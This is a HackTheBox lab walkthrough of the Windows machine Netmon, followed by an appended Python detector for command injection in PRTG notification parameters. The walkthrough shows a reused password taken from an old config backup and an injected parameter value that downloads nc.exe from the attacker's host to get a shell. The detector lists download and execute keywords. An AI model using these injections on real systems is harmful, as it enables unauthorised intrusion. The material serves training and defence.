Hackthebox Walkthroughs: Netmon


Hello again. Netmon is a Windows machine from hackthebox. I enjoyed getting root on this machine as it required a little extra out-of-the-box thinking. Let’s start the dirty work; the IP of the machine is 10.10.10.152.

Scanning with Nmap: nmap -sV 10.10.10.152
Manish Bhardwaj's Blog

As we can see, anonymous login is allowed on port 21. So let’s play with FTP.


After googling about the PRTG configuration file, I found the location as

%programdata%\Paessler\PRTG Network Monitor

After looking through the files, I found a password in PRTG Configuration.old.bak and, as you can see, the database hasn’t been updated for a long time, i.e. since 2018. The password in 2018 carried that same year number; it’s 2019 now, so I changed the year in the password to the current one.

Tadda!! I logged in.

After visiting the profile section, I tried to add a new notification.

Let me create a new notification with the name testMB.

I gave a random file name and tried to copy the root.txt file to a new file, minions.txt, and as the curse of pentest follows, I was unable to copy the root flag (it took 20-30 attempts).

I returned to the Swiss Army knife and tried this time with nc.exe.

Again I edited the Execute Program settings and tried to transfer nc.exe from my Kali to the target.

test.txt; Invoke-WebRequest http://10.10.14.9:8000/nc.exe -OutFile c:\Users\Public\Downloads\nc.exe

Let’s check whether nc was transferred or not.

Woooshh!! Finally, something good happened. Let’s try to execute nc and start an nc listener on Kali.

Well, this worked and finally, after a plethora of trials, I got a shell with root.txt.
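
From the defender's side, the parameter value used above is easy to spot: a file name followed by a statement separator and a second command. The sketch below is an added example, not part of the original walkthrough or of PRTG itself; the function names, the keyword list and the benign sample values are assumptions constructed for illustration.

```python
import re

# Keywords that fetch or launch content. The list is an assumption made for
# this example; tune it to your environment.
SUSPICIOUS = re.compile(
    r"\b(invoke-webrequest|iwr|wget|curl|invoke-expression|iex|"
    r"start-process|certutil|bitsadmin|nc(\.exe)?)\b", re.I)
SEPARATORS = {";", "|", "&", "\r", "\n"}


def split_statements(param):
    """Split on PowerShell statement separators that sit outside quotes."""
    parts, buf, quote = [], [], None
    for ch in param:
        if quote:                      # inside a quoted string: copy verbatim
            buf.append(ch)
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
            buf.append(ch)
        elif ch in SEPARATORS:         # unquoted separator ends a statement
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf).strip())
    return [p for p in parts if p]


def review_parameter(param):
    """Return a list of findings for one notification parameter value."""
    findings = []
    stmts = split_statements(param)
    if len(stmts) > 1:
        findings.append("extra statement after separator: %r" % stmts[1])
    if "$(" in param:
        findings.append("subexpression present")
    hit = SUSPICIOUS.search(param)
    if hit:
        findings.append("download/exec keyword: %s" % hit.group(0))
    return findings


# First value is the one shown in the walkthrough; the rest are constructed.
SAMPLES = [
    r"test.txt; Invoke-WebRequest http://10.10.14.9:8000/nc.exe "
    r"-OutFile c:\Users\Public\Downloads\nc.exe",
    '"disk full; check now" server01',
    "report.txt | iex",
]

if __name__ == "__main__":
    for value in SAMPLES:
        print(value[:40], "->", review_parameter(value) or "clean")
```

An unquoted `&` inside a legitimate URL would also be flagged, so treat hits as items to review rather than verdicts.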
